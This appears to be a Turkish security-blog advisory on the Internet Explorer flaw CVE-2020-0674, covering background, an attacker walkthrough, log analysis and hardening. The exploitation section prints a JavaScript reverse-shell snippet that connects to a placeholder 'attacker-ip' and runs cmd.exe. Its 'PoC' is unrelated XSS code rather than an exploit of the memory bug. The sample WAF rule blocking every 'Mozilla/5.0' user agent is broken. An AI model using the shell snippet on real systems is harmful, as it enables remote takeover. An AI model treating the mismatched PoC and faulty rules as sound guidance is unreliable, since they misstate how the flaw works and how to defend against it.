CVE-2020-0674 · Bilgilendirme

Microsoft Internet Explorer Scripting Engine Memory Corruption Vulnerability

CVE-2020-0674, Microsoft Internet Explorer'da bellek bozulması nedeniyle uzaktan kod yürütme riski taşıyan kritik bir zafiyettir.

Üretici
Microsoft
Ürün
Internet Explorer
Seviye
yüksek
Yayın Tarihi
05 Nisan 2026
Okuma
8 dk okuma

CVE-2020-0674: Microsoft Internet Explorer Scripting Engine Memory Corruption Vulnerability

Zorluk Seviyesi: Orta | Kaynak: CISA KEV

Zafiyet Analizi ve Giriş

CVE-2020-0674, Microsoft’un Internet Explorer (IE) tarayıcısındaki bir bellek yıkımı (memory corruption) zafiyetidir. Bu zafiyet, Scripting Engine’in bellek içerisindeki nesneleri işleme şekliyle ilişkilidir. Başarıyla istismar edilmesi durumunda, bu zafiyet uzaktan kod yürütme (remote code execution - RCE) imkanı sunabilir. Özellikle, bu zafiyetin fırsatını yakalayan bir saldırgan, mevcut kullanıcının tüm haklarıyla sistem üzerinde kötü niyetli kod çalıştırabilir.

Zafiyetin tarihi, 2020 yılının Ocak ayına dayanır. Microsoft, bu zafiyeti keşfettikten sonra Şubat 2020'de bir yamanın yayınlanarak etkili bir şekilde kapatıldığını duyurdu. Ancak, zafiyetin kötüye kullanım potansiyeli, kullanıcıların Internet Explorer kullanım alışkanlıklarını ve eski tarayıcı sürümlerinin yaygın olmasını göz önünde bulundurunca oldukça ciddi bir tehdit oluşturdu.

Bu zafiyetin kökenleri, Scripting Engine olarak bilinen ve JavaScript gibi istemci tarafı dilleri işleyen motorun bellek yönetimindeki hata ve eksikliklere dayanmaktadır. Şu anki Internet Explorer sürümleri, bu motoru kullanarak web sayfalarını işlerken, bellek içerisinde nesneleri doğru bir şekilde yönetemediği için yıkım oluşabiliyor ve bu da kötü niyetli kişilerin sistem üzerinde komutlar çalıştırmasına neden olabiliyor. Örnek vermek gerekirse, bir saldırgan, Internet Explorer kullanıcısını kötü bir web sayfasına yönlendirdiğinde, bu zafiyeti istismar ederek sisteme zararlı yazılımlar enjekte edebilir.

Dünya genelinde, bu zafiyet özellikle finans, sağlık ve eğitim sektörü gibi kritik alanlarda ciddi tehditler oluşturmuştur. Bu sektörlerdeki kullanıcıların, hassas bilgilerini işleyen sistemlerinde Internet Explorer gibi eski tarayıcıları kullanmaları, RCE saldırılarına karşı daha savunmasız hale gelmelerine neden olmaktadır. Özellikle, bir finansal kurumun sistemine sızılması durumunda, müşteri bilgileri veya işlem verileri tehlikeye girebilir.

Zafiyetin etkisinin azaltılması için önerilen en iyi uygulamalardan biri, Internet Explorer gibi eski tarayıcıların yerine daha güncel ve güvenli web tarayıcılarının kullanılmasıdır. Ayrıca, saldırı potansiyeli yüksek olan web sitelerine karşı dikkatli olunması, bilinmeyen kaynaklardan gelen dosyaların açılmaması gerekmektedir. Güvenlik eğitimleri düzenleyerek, kullanıcıların güvenli internet kullanımı hakkında bilgi sahibi olmaları sağlanmalıdır.

Sonuç olarak, CVE-2020-0674, yalnızca teknik bir zafiyet değil, aynı zamanda güvenlik kültürünü ve farkındalığını da sorgulatan bir durumdur. Organizasyonların, bilişim sistemlerini koruma yollarını ve kullanıcı eğitimi süreçlerini sürekli olarak güncellemeleri, bu tür zafiyetlerin etkisini sınırlandırmada kritik rol oynayacaktır.

Teknik Sömürü (Exploitation) ve PoC

Microsoft Internet Explorer (IE) üzerindeki CVE-2020-0674 zafiyeti, Scripting Engine'in hafıza yönetiminden kaynaklanan bir bellek bozulması (memory corruption) sorununu barındırmaktadır. Bu zafiyetin başarılı bir şekilde istismar edilmesi, saldırganın, hedef sistemde mevcut kullanıcı bağlamında uzaktan kod yürütmesine olanak tanıyabilir. Bu nedenle, bu zafiyetin çözümü ve exploitation (sömürü) yöntemleri üzerine teknik bir değerlendirme yapmak öncelikli hedef olmalıdır.

Sömürü aşamalarına geçmeden önce, bu tür bir zafiyetin gerçek dünyada nasıl istismar edilebileceğini anlamak önemlidir. Örneğin, bir kullanıcının kötü niyetli bir web sitesini ziyaret etmesi durumunda, bu siteye entegre edilmiş bir JavaScript kodu sayesinde zafiyetin istismar edilmesi mümkündür. JavaScript kullanılarak, kullanıcı aklındaki nesneler manipüle edilir ve bellek bozulması sağlanır. Bunun sonucu olarak, uzaktan kod yürütme (RCE) elde etmek hedeflenir.

Exploitation işlemi genellikle şu adımları içerir:

  1. Zafiyetin Tespiti: İlk olarak, hedef sistemin Microsoft Internet Explorer sürümünün CVE-2020-0674 ile etkilenip etkilenmediği belirlenmelidir. Hedefin hangi sürümü kullandığı tespit edilerek, zafiyetin mevcut olup olmadığı kontrol edilmelidir.

  2. Kötü Amaçlı Payload Hazırlama: Saldırgan, hedef sistemde çalıştırılabilecek bir payload (yük) tasarlayarak, bu yükü zafiyeti istismar etmek için kullanır. Aşağıda basit bir Python örneği verilmiştir:

    import requests

# Kötü niyetli script için payload
payload = "<script>alert('Zafiyet başarılı!');</script>"

# Kötü niyetli web sayfası oluşturmak
response = requests.post("http://target-site.com/exploit", data={'data': payload})
print(response.text)

  3. Sosyal Mühendislik: Saldırgan, hedef kişiyi veya grubu kötü niyetli web sitesine yönlendirmek için sosyal mühendislik (social engineering) tekniklerini kullanabilir. Hedefin bu siteyi ziyaret etmesi sağlanmalı.

  4. Zafiyetin İstismarı: Hedef kullanıcı web sayfasını ziyaret ettiğinde, kötü niyetli JavaScript kodu çalışır ve hedef sistemde bellek bozulması meydana gelir. Bu aşamada, saldırganın hazırladığı payload (yük) çalıştırılır. Örneğin, bir reverse shell (ters kabuk) oluşturulabilir:

    var shell = new WebSocket('ws://attacker-ip:port');
shell.onopen = function() {
    var cmd = "cmd.exe";
    var proc = new ActiveXObject("WScript.Shell");
    shell.send(proc.Exec(cmd).StdOut.ReadAll());
};

  5. Kontrol Elde Etme: Yük çalıştığında, saldırgan sistem üzerinde kontrol elde eder. Bu aşama sırasında birçok kötü niyetli etkinlik yapılabilir, örneğin dosya kopyalama, sistem bilgilerine erişim veya başka kötü amaçlı yazılımlar yükleme.

  6. İzleri Temizleme: Saldırgan, başarılı bir istismarın ardından, sistem üzerindeki izleri silmek için çeşitli yöntemler kullanabilir.

Sonuç olarak, CVE-2020-0674 zafiyeti, kullanıcıları ciddi tehditler ile karşı karşıya bırakmaktadır. Bu zafiyetin istismarına yönelik yöntemler, saldırganlar tarafından etkili bir şekilde kullanılabilir. Bireysel kullanıcılar ve şirketler, güncellemeleri takip ederek, bu tür zafiyetlerin etkisine karşı korunmalıdır. Ayrıca, internet tarayıcılarının en güncel sürümlerinin kullanılması ve kullanıcıların şüpheli bağlantılara tıklamaktan kaçınmaları önem arz etmektedir.

Forensics (Adli Bilişim) ve Log Analizi

CVE-2020-0674, Microsoft Internet Explorer’ın Scripting Motorunda yer alan bir bellek bozulması (memory corruption) zafiyetidir. Bu zafiyet, kötü niyetli bir kullanıcının veya saldırganın, kurbanın sisteminde uzak kod çalıştırmasına (remote code execution – RCE) imkan tanıyabilir. Saldırgan, bu zafiyeti kullanarak kullanıcının mevcut oturumunun bağlamında kötü amaçlı komutlar çalıştırabilir. Bu durum, özellikle tarayıcı tabanlı saldırılarda oldukça tehlikeli sonuçlar doğurabilir.

Adli bilişim ve log analizi alanında, siber güvenlik uzmanları bu tür bir saldırının gerçekleşip gerçekleşmediğini tespit etmek için log dosyalarını dikkatlice incelemelidir. SIEM (Security Information and Event Management) sistemleri, şüpheli aktiviteleri ve anormallikleri belirlemek için kritik öneme sahiptir. Log analizi yaparken, aşağıdaki adımlar ve imzalar (signature) göz önünde bulundurulmalıdır:

Öncelikle, internet tarayıcısında meydana gelen tüm erişim kayıtlarını gözden geçirmek önemlidir. Access log (erişim kaydı) dosyaları, kullanıcının sistemine hangi URL'lerin, hangi zamanlarda ve hangi IP adreslerinden erişildiğini ayrıntılı bir şekilde gösterir. Zafiyetin kullanılması olası web sayfalarının URL’lerinde anormallikler (şüpheli parantez yapıları veya anormal parametreler) aramak gereklidir. Özellikle şu tür URL yapıları dikkat çekebilir:

http://example.com/?input=<script>alert(1)</script>

Bu tür URL’ler, tarayıcıya enfekte olma ihtimalini artıran, kullanıcıyı kötü amaçlı bir sayfaya yönlendiren veya etkilemeye çalışan XSS (Cross-Site Scripting) saldırılarına işaret edebilir.

Bununla birlikte, Internet Explorer veya diğer tarayıcılara ait error log (hata kaydı) dosyalarında, sistemin beklenmeyen şekilde kapandığı veya çöktüğüyle ilgili kayıtlar da oldukça önemlidir. Bu kayıtlar genellikle "Exception" veya "Fault" gibi anahtar kelimelerle başlar ve aşağıdaki gibi bir formatta kaydedilir:

Faulting application name: iexplore.exe, version: x.x.x.x
Faulting module name: unknown, version: 0.0.0.0
Exception code: 0x80000003
...

Bu tür hatalar, potansiyel bir bellek bozulması zafiyetinin kurbanı olduğuna dair güçlü bir gösterge olabilir. Pyhton veya bir başka programlama diliyle otomatik analizler yapmak, geçmiş log dosyalarını tararken hata kodlarının sıklığını çıkarmak ve bu şekilde istatistiksel anormallikler belirlemek de faydalı olabilir.

RCE (remote code execution – uzak kod yürütme) zafiyetlerinin tespiti için, özellikle sistemde tanınmamış veya beklenmeyen uygulamaların çalıştığına dair aktiviteleri izlemek gereklidir. Kullanıcıların sistemlerinde beklenmedik bir yazılım çalışıyorsa, bu durum kötü niyetli bir müdahale olabilir. SIEM araçları, bu tür uygulamaları tanımlamak için "process creation events" (işlem oluşturma olayları) ve "user login events" (kullanıcı oturum açma olayları) gibi logları analiz edebilir.

Son olarak, log dosyalarında kullanıcıların alışılmış davranışlarının ötesinde hareket ettikleri durumları da incelemek önemlidir. Örneğin, normalde harici kaynaklara erişmeyen bir kullanıcının, birden fazla farklı IP adresinden yönlendirilmesi olabilir. Bu tür durumlar, dikkatlice incelenmeli ve şüpheli aktiviteler olarak kategorize edilmelidir. Adli bilişim çalışmalarında, doğru log analizi ile birlikte, etkili bir siber güvenlik politikası geliştirilmesi, kurumsal güvenliği pekiştirecektir.

Savunma ve Sıkılaştırma (Hardening)

Microsoft Internet Explorer Scripting Engine Memory Corruption Vulnerability (CVE-2020-0674), kullanıcıların bilgisayarlarına uzaktan kötü niyetli yazılımlar yüklenmesine olanak sağlayan ciddi bir güvenlik açığıdır. Bu açık, Scripting Engine’in bellek nesnelerini işleme biçiminden kaynaklanan bellek hasarı (memory corruption) nedeniyle ortaya çıkmaktadır. Saldırganlar, bu zaafiyeti kullanarak, hedef sistemde uzaktan kod çalıştırma (RCE - Remote Code Execution) yeteneğine sahip olabilir. Doğru bir saldırı ile, kötü amaçlı yazılımın kurbanın bilgisayarına erişmesine yol açabilir ve bu da önemli veri kayıplarına veya gizliliğin ihlaline neden olabilir.

Bu tür bir saldırıya karşı alınacak önlemler yalnızca güvenlik yamaları uygulamakla kalmaz, aynı zamanda sistemin genel güvenliğini artırmaya yönelik sıkılaştırma stratejileri gerektirir. Öncelikle, Microsoft tarafından yayınlanan en son güncellemeleri ve güvenlik yamalarını kullanmak kritik bir adımdır. Ancak, sadece yamalarla sınırlı kalmak yeterli değildir; sistemin güvenlik duruşunu güçlendiren başka önlemler de alınmalıdır.

Firewal (Güvenlik Duvarı) ve Web Application Firewall (WAF) kullanımı, sistemlerin tehditlere karşı korunmasına yardımcı olan önemli bir konudur. WAF kullanılarak, potansiyel olarak kötü niyetli istekler engellenebilir. Ağ üzerinden gelen trafiği izleyen ve zararlı olduğu tespit edilen belirli kalıpları tanımlayan özel WAF kuralları oluşturmak, bu tür açıklara karşı katmanlı bir savunma sağlar. Örneğin, şunları içeren kurallar geliştirilebilir:

# Örnek WAF Kuralı
SecRule REQUEST_HEADERS:User-Agent "Mozilla/5.0" "id:1001,phase:1,deny,status:403"
SecRule ARGS:input "cmd=*" "id:1002,phase:2,deny,status:403"

Bu kurallar, potansiyel tehlikeli kullanıcı ajanlarını ve belirli komut içerikleri taşıyan istekleri tespit edip engelleyebilir.

Ayrıca, sistemleriniz için kalıcı bir sıkılaştırma planı oluşturmak önemlidir. Bu, yalnızca yazılımın güncellenmesiyle sınırlı kalmamalı; aynı zamanda kullanıcı hesaplarının yönetimi, yetki denetimi ve ağ segmentasyonu gibi temel alanları da içermelidir. Özellikle, kullanıcıların sadece ihtiyaç duydukları erişim haklarına sahip olmalarını sağlamak için en az ayrıcalık (least privilege) ilkesine dayalı bir iç erişim politikası uygulanmalıdır.

Eğitim, siber güvenlik kültürünün en önemli parçalarından biridir. Kullanıcıların, olası sosyal mühendislik saldırılarına karşı farkındalık kazanmalarını sağlamak, bu gibi faydalı bilgilerin yaygınlaştırılmasına yardımcı olur. Phishing (oltalama) türündeki saldırılar, bu tür bellek yozunmalarını (memory corruption) kolaylaştırabilir; bu yüzden kullanıcıların dikkatli olması gerektiği konusunda eğitim verilmelidir.

Son olarak, sistemlerinizi düzenli olarak izlemek ve log (günlük) kayıtlarını analiz etmek, olası bir ihlali zamanında fark etmenizi sağlar. Herhangi bir anormal aktivite tespit edildiğinde hızlıca önlem almak, saldırganların başarılı olmasını engelleyebilir. Bunun için otomatik izleme araçları kullanarak, anormal davranışları tespit etmek için belirli algoritmalar geliştirilebilir.

Tüm bu adımlar, CVE-2020-0674 gibi kritik zaafiyetlere karşı korunmanıza yardımcı olacak ve genel siber güvenlik duruşunuzu güçlendirecektir. Unutulmamalıdır ki, siber güvenlik, sürekli bir gelişim ve adaptasyon sürecidir; bu nedenle araçlarınızı ve yöntemlerinizi sürekli olarak gözden geçirmeniz önemlidir.